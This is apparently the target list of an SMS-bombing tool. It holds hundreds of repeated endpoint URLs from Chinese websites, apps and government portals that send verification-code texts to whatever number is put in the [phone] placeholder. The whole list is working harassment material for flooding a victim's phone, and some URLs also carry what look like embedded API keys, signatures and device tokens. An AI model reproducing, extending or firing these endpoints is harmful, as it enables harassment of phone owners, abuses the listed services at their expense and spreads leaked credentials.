"https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", - "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.nongyisheng.com/sms/code?fr=pc&token=false&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", - "https://beacons.gcp.gvt2.com/domainreliability/upload", - "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://reg.uuyoyo.com/AshxHandler/AjaxRegHandler.ashx?action=reg_phone_code_send&_=&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://api.xinmaotong.cn/flw-auth/code?phone=[phone]&type=0", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://hk-dns.sskweb.cn/api.php?act=user&key=XsWxsZDyh58V9whXWR&phone=[phone]", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", - "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=重庆市&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]&v=5.5.32.83027", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", - "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", - "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", - "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", - "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "https://logic-zone-10007.api.xlgxapp.com/315000/rider/api/v3/message/[phone]?event=OneKeyLogin", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", - "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", - "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "https://couple-api.jizhangapp.com/login/captcha/[phone]", - "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", - "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "https://api.julym.com/hz/api.html?number=[phone]", - "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", - "https://m.wanghairead.com/api/5b9e03e333e5e?phone=[phone]&send_type=1", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", - "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", - "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang的 iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", - "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - 